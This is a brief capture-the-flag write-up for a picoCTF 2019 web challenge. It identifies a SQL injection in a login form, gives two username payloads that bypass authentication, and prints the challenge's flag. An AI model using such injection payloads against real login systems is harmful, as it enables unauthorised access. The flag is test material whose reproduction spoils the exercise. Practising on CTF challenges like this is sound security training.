Point: 300
Web Exploitation
There is a website running at https://2019shell1.picoctf.com/problem/37868/arrow-up-right (link) or http://2019shell1.picoctf.com:37868arrow-up-right. Do you think you can log us in? Try to see if you can login!
There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?
Try to think about how does the website verify your login?
This is a SQL injection vuln.
Username: ' OR 'A' = 'A' -- or another one: ' OR 1 --
Then click to Login button to see the flag
picoCTF{s0m3_SQL_a57b0b1d}
Last updated 5 years ago